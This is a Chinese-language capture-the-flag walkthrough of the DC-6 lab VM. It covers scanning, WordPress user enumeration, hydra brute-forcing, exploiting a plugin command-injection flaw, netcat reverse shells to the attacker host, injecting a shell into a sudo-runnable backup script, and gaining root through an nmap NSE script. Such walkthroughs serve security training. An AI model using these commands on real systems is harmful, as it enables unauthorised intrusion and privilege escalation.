靶机介绍

这次的靶机渗透实战是一个找寻靶机中的flag的过程，并以获得最终的flag为目标。
靶机下载地址:http://www.five86.com/dc-6.html

信息搜集

直接上nmap进行扫描

nmap -sV -A -p- 172.16.0.18

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20

Nmap scan report for localhost (172.16.0.18) Host is up (0.00019s latency). Not shown: 65533 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0) | ssh-hostkey: | 2048 3e:52:ce:ce:01:b6:94:eb:7b:03:7d:be:08:7f:5f:fd (RSA) | 256 3c:83:65:71:dd:73:d7:23:f8:83:0d:e3:46:bc:b5:6f (ECDSA) |_ 256 41:89:9e:85:ae:30:5b:e0:8f:a4:68:71:06:b4:15:ee (ED25519) 80/tcp open http Apache httpd 2.4.25 ((Debian)) |_http-server-header: Apache/2.4.25 (Debian) |_http-title: Did not follow redirect to http://wordy/ |_https-redirect: ERROR: Script execution failed (use -d to debug) MAC Address: 00:0C:29:9C:80:16 (VMware) Device type: general purpose Running: Linux 3.X|4.X OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 OS details: Linux 3.2 - 4.9 Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

可知开放22、80端口，linux主机，同样要设置hosts,发现是wordpress
发现开了80端口却无法访问，是重定向到wordy域名，可改hosts文件访问，添加ip对应域名

win10路径： C:\Windows\System32\drivers\etc\hosts

linux路径： etc/hosts

• 根据靶机官网提示

  cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt That should save you a few years. ;-)
  猜测爆破进入后台

渗透实战

1. wpscan扫描用户,获取到5个用户

   wpscan –url wordy -e u

   1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23

   [+] admin | Found By: Rss Generator (Passive Detection) | Confirmed By: | Wp Json Api (Aggressive Detection) | - http://wordy/index.php/wp-json/wp/v2/users/?per_page=100&page=1 | Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Login Error Messages (Aggressive Detection) [+] graham | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Confirmed By: Login Error Messages (Aggressive Detection) [+] mark | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Confirmed By: Login Error Messages (Aggressive Detection) [+] sarah | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Confirmed By: Login Error Messages (Aggressive Detection) [+] jens | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Confirmed By: Login Error Messages (Aggressive Detection)

2. 尝试爆破ssh和web后台

• 爆破后台

  hydra -L users.txt -P jimpass.txt -f wordy http-post-form “wp-login.php:text=^USER^&pwd=^PASS^:S=logout”

• 获取到密码

  mark helpdesk01

• 进入后台发现有个active管理插件命令执行漏洞
  
• 直接抓包使用nc反弹shell

  nc 172.16.0.10 2222 -e /bin/bash
  

• 获取交互shell

  python -c “import pty;pty.spawn(‘/bin/bash’)”

  1 2 3 4

  root@bbkali:/tmp/dc6# nc -lvp 2222 listening on [any] 2222 ... connect to [172.16.0.10] from wordy [172.16.0.18] 36108 python -c "import pty;pty.spawn('/bin/bash')"

• 常规翻看目录，发现有价值提示to-do-sometings.txt

  1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28

  www-data@dc-6:/home$ ls -R .: graham jens mark sarah ./graham: ./jens: backups.sh ./mark: stuff ./mark/stuff: things-to-do.txt ./sarah: www-data@dc-6:/home/mark/stuff$ cat things-to-do.txt Things to do: - Restore full functionality for the hyperdrive (need to speak to Jens) - Buy present for Sarah's farewell party - Add new user: graham - GSo7isUM1D4 - done - Apply for the OSCP course - Buy new laptop for Sarah's replacement

• 发现graham密码

3. 提权

• ssh登录graham发现backups.txt可利用提权

  1 2 3 4 5 6 7 8 9 10

  graham@dc-6:/home$ sudo -l Matching Defaults entries for graham on dc-6: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User graham may run the following commands on dc-6: (jens) NOPASSWD: /home/jens/backups.sh graham@dc-6:/home$ cat /home/jens/backups.sh #!/bin/bash tar -czf backups.tar.gz /var/www/html

• 直接将nc命令加入backups.sh

  1 2 3

  graham@dc-6:/home/jens$ cat backups.sh nc 172.16.0.10 2223 -e /bin/bash graham@dc-6:/home/jens$ sudo -u jens ./backups.sh

• 获取到jens权限,发现能以root用户免密码执行nmap

  1 2 3 4 5 6 7 8 9 10 11

  pwd /home whoami jens sudo -l Matching Defaults entries for jens on dc-6: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User jens may run the following commands on dc-6: (root) NOPASSWD: /usr/bin/nmap

• 写个nmap脚本

  echo ‘os.execute(“/bin/sh”)’ > root.nse

• 运行该脚本获取root权限并拿到flag

  sudo nmap –script=/home/jens/root.nse

  1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29

  jens@dc-6:~$ sudo nmap --script=/home/jens/root.nsesudo nmap --script=/home/jens/root.nse Starting Nmap 7.40 ( https://nmap.org ) at 2020-02-07 00:06 AEST # pwd /home/jens # whoami root # cd /root # s^H /bin/sh: 4: : not found # ls theflag.txt # cat theflag.txt Yb dP 888888 88 88 8888b. dP"Yb 88b 88 888888 d8b Yb db dP 88__ 88 88 8I Yb dP Yb 88Yb88 88__ Y8P YbdPYbdP 88"" 88 .o 88 .o 8I dY Yb dP 88 Y88 88"" `"' YP YP 888888 88ood8 88ood8 8888Y" YbodP 88 Y8 888888 (8) Congratulations!!! Hope you enjoyed DC-6. Just wanted to send a big thanks out there to all those who have provided feedback, and who have taken time to complete these little challenges. If you enjoyed this CTF, send me a tweet via @DCAU7.